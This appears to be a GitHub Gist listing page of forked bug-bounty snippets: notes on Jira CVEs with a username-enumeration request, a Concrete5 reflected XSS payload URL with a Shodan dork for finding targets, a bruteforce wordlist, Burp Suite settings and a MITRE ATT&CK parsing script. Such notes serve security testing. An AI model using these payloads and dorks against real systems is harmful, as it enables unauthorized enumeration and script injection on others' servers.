abramas sow abramas
abramas
/ Jira bug-exploit
Created
April 4, 2022 11:48
— forked from 0x240x23elu/Jira bug-exploit
Jira Bug CVE-2019-8449,CVE-2019-8451,CVE-2019-8451,cve-2018-20824,cve-2020-14179,cve-2020-14181,CVE-2018-5230
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cve-2019-8449 | |
| The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. | |
| https://jira.atlassian.com/browse/JRASERVER-69796 | |
| https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true | |
| ===================================================================================================================================== |
abramas
/ Concrete5 CMS XSS vulnerability
Created
February 17, 2022 11:01
— forked from simrotion13/Concrete5 CMS XSS vulnerability
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Concrete5 CMS XSS vulnerability tweet by Jackson | |
| Shodan Dork : 'Set-Cookie: CONCRETE5' | |
| Vulnerable URL : | |
| https://IP:PORT/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><img/src/onerror=.1|alert(document.domain)> | |
| By using below URL we can download the results. ( Shodan Premium API Key is needed ) | |
| shodan download concrete5 'Set-Cookie: CONCRETE5' |
abramas
/ wordlist.txt
Created
May 19, 2020 15:27
— forked from random-robbie/wordlist.txt
bruteforce wordlist for bug bountys
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 20-ev-allgemein | |
| 20-years | |
| 200 | |
| 2000 | |
| 20000719 | |
| 2001 | |
| 2001cc | |
| 2002 | |
| 2003 | |
| 2004 |
abramas
/ burpsettings.json
Created
December 21, 2019 01:24
— forked from jgamblin/burpsettings.json
Burp Settings JSON
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "project_options":{ | |
| "connections":{ | |
| "hostname_resolution":[], | |
| "out_of_scope_requests":{ | |
| "drop_all_out_of_scope":false, | |
| "exclude":[ | |
| { | |
| "enabled":true, | |
| "file":"logout", |
abramas
/ attack-to-csv.py
Created
May 15, 2019 13:21
— forked from vysecurity/attack-to-csv.py
Get MITRE ATT&CK Framework Techniques by Group in CSV
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from stix2 import FileSystemSource | |
| from stix2 import Filter | |
| from stix2.utils import get_type_from_id | |
| fs = FileSystemSource('./enterprise-attack') | |
| def get_group_by_alias(src): | |
| return src.query([ | |
| Filter('type', '=', 'intrusion-set'), | |
| ]) |